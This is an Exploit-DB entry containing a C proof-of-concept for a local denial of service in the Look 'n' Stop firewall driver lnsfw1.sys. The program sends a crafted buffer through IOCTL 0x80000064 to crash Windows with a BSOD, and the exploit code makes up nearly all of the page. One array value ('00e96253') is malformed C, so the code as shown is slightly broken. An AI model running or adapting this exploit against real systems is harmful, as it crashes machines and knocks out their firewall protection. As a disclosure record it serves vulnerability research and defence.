Look n stop - Local Denial of Service

EDB-ID:

16021


Author:

Heurs

Type:

dos


Platform:

Windows

Date:

2011-01-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

/*
Program          : Look 'n' Stop 2.06p4 / 2.07 (6.0.2900.5512)
Homepage         : http://www.looknstop.com
Discovery        : 2009/11/08
Author Contacted : 2010/07/15 ... no reply
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description

Look 'n' Stop Firewall 2.07 provides key features to protect your computer
against cyber threats. It prevents malicious programs from transmitting the
data of your computer to hacker's computers. Look 'n' Stop Firewall 2.07
also protects your computer from external intrusions.

//----- Description of vulnerability

lnsfw1.sys driver generate a BSOD with particular value of IOCTL. Kernel wait
an action with a kernel debugger.

//----- Credits

http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

*/

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
        0x200ff822, 0xd24b37a1, 0x8ce055dc, 0x70b3d269,
        0x3d2ef498, 0xcdd0e57c, 0xf2699fab, 0xed753dcb,
        0xfdde2a99, 0x90590b61, 0x28011112, 0xeb35191c,
        0x36f0e1e7, 0xef7ee764, 0x09b01e1f, 0x0bb86825,
        0x1b886612, 0xd8c289df, 0xaa21ad45, 0x6fa7a76d,
        0x13492a54, 0x7c2bc443, 0x65dbf582, 0xffeb86cc,
        0xf48ca4fd, 0x75542bb5, 0xd05638ba, 0x3876e368,
        0x678ba399, 0x6779f15c, 0x8f89ff55, 0xc8b9cf02,
        0x033b9857, 0x82eef1a9, 0xf0dba3b6, 0xadf5b8f6,
        0x033ef961, 0x393f043b, 0x515896fd, 0x28d10e25,
        0x37b7f707, 0x1a425f92, 0x4bc6acfb, 0x45390605,
        0x0be40107, 0xf121a706, 0x4b4c0e31, 0x88889f12,
        0x0c60806d, 0x03af4569, 0xe5b68798, 0xb22bd966,
        0xd532fe7f, 0x19a7213a, 0x6927f7f5, 0xcd4c3202,
        0x96831f6b, 0x1d09991d, 0x48d1da67, 0x68f24415,
        0xbb01a216, 0xdb6b634a, 0x18e36cb4, 0xcd7265c2,
        0x64b81111, 0x4305d1b3, 0xc4f1ee8d, 0xfcd61343,
        0xb8bfc8b9, 0x8a1a5541, 0xe9c3adcb, 0xca4c2a56,
        0x89a67e7d, 0x74b8704e, 0xfe70e4d6, 0x27612082,
        0xd8e211d7, 0x190ec39c, 0x380dfc09, 0x8d649b0c,
        0xeda15e23, 0xe2e76319, 0xc781f249, 0x4cb25434,
        0xeff3dc6a, 0xa0a6e976, 0x57014474, 0x98629b36,
        0x2cc9fb9d, 0xa6a8b31b, 0xa3fbef44, 0xfeb130d3,
        0x91e8c96b, 0xdc953762, 0x77341f7c, 0xd4ec9d26,
        0x8504a663, 0x1da0406a, 0x8a049adf, 0x0f2ca8ef,
        0xbc93ec1e, 0x027bdfad, 0x4c8885f6, 0x1c30be98,
        0x0ec01493, 0x124d4252, 0x0765f8c1, 0x801652da,
        0x778a6e6a, 0x09ef17aa, 0x6ece13fd, 0xa7280f9c,
        0xcf6235f9, 0xabdeae81, 0x8145979e, 0x45af7871,
        0xed3d36e0, 0x9e223b88, 0xfe26e7f2, 0xe13743f1,
        0xa8171a6e, 0x611c303f, 0x252a68d2, 0xd013e026,
        0x1259b868, 0xf673c420, 0x27a60840, 0xd87eed92,
        0xef872203, 0x26868592, 0x18324bc9, 0xed47e068,
        0xf2c0b162, 0x95966d8e, 0x07cc53db, 0xe8360489,
        0x7c630b42, 0x8ab52dd9, 0xc5bf0c0e, 0xae8a8284,
        0x97a0a5ab, 0x0cccb1c4, 0x4d768275, 0x1101e67e,
        0x16e2f2c3, 0x82b7686a, 0x5b26314e, 0x52f74f38,
        0xcb341107, 0xa59c70d0, 0x3327af19, 0xdd51188f,
        0x54636221, 0xa05f288a, 0xeb7d4a3a, 0x2065885d,
        0xb103190e, 0xd36e7e1e, 0xf7a7d560, 0xc62c828d,
        0x9fc687e9, 0xcf609352, 00e96253
        };
    BYTE Out[0x20];
    
    printf("0day Local DoS - Look 'n' Stop 2.06p4\n\n");
    hDevice = CreateFile("\\\\.\\LNSFW1",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    printf("%x\n",hDevice);
    
    DeviceIoControl(hDevice,0x80000064,Crashing,0x28b,0,0,&NombreByte,NULL);
    
    printf("Sploit Send.\n\n");
    CloseHandle(hDevice);
    getch();
    return 0;
}